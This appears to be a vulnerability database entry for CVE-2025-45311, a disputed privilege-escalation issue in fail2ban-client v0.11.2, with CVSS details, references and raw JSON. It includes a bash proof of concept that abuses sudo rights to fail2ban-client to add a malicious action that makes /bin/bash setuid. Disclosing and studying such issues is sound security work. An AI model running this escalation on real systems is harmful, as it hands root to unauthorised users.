Security Vulnerability Report
CVE-2025-45311 CVSS 8.8 HIGH

CVE-2025-45311

Published: 2025-11-26 16:15:48
Last Modified: 2026-04-15 00:35:42

Description

Insecure permissions in fail2ban-client v0.11.2 allow attackers with limited sudo privileges to perform arbitrary operations as root. NOTE: this is disputed by multiple parties because the action for a triggered rule can legitimately be an arbitrary operation as root. Thus, the software is behaving in accordance with its intended privilege model.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

fail2ban-client v0.11.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# CVE-2025-45311 PoC - fail2ban-client Privilege Escalation
# Assumptions: Attacker has low-privilege access and sudo rights to fail2ban-client

# Step 1: Create a custom action configuration
cat > /tmp/evil_action.conf << 'EOF'
[Definition]
actionstart = touch /tmp/fail2ban_pwned
actionban = chmod 4777 /bin/bash
actionunban = rm -f /tmp/fail2ban_pwned
EOF

# Step 2: Configure jail to use the malicious action
sudo fail2ban-client set <jail_name> action add /tmp/evil_action.conf

# Step 3: Trigger the ban by generating malicious log entries
for i in {1..10}; do
  echo "$(date) authentication failure for root from attacker" >> /var/log/test.log
done

# Step 4: Wait for fail2ban to process and trigger the action
sleep 5

# Step 5: Verify privilege escalation
ls -la /bin/bash
# If successful, /bin/bash should have the setuid bit set (-rwsrwxrwx)

# Cleanup
sudo fail2ban-client set <jail_name> action delete /tmp/evil_action.conf

References

https://gist.github.com/R-Security/1c707a08f9c7f9a91d9d84b5010aaed2
https://github.com/fail2ban/fail2ban/issues/4110
https://packetstorm.news/files/id/189989
http://www.openwall.com/lists/oss-security/2025/12/03/2

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-45311",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-26T16:15:47.663",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [
      {"sourceIdentifier": "[email protected]", "tags": ["disputed"]}
    ],
    "descriptions": [
      {
        "lang": "en",
        "value": "Insecure permissions in fail2ban-client v0.11.2 allows attackers with limited sudo privileges to perform arbitrary operations as root. NOTE: this is disputed by multiple parties because the action for a triggered rule can legitimately be an arbitrary operation as root. Thus, the software is behaving in accordance with its intended privilege model."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-266"}]
      }
    ],
    "references": [
      {"url": "https://gist.github.com/R-Security/1c707a08f9c7f9a91d9d84b5010aaed2", "source": "[email protected]"},
      {"url": "https://github.com/fail2ban/fail2ban/issues/4110", "source": "[email protected]"},
      {"url": "https://packetstorm.news/files/id/189989", "source": "[email protected]"},
      {"url": "http://www.openwall.com/lists/oss-security/2025/12/03/2", "source": "af854a3a-2127-422b-91ae-364da2661108"}
    ]
  }
}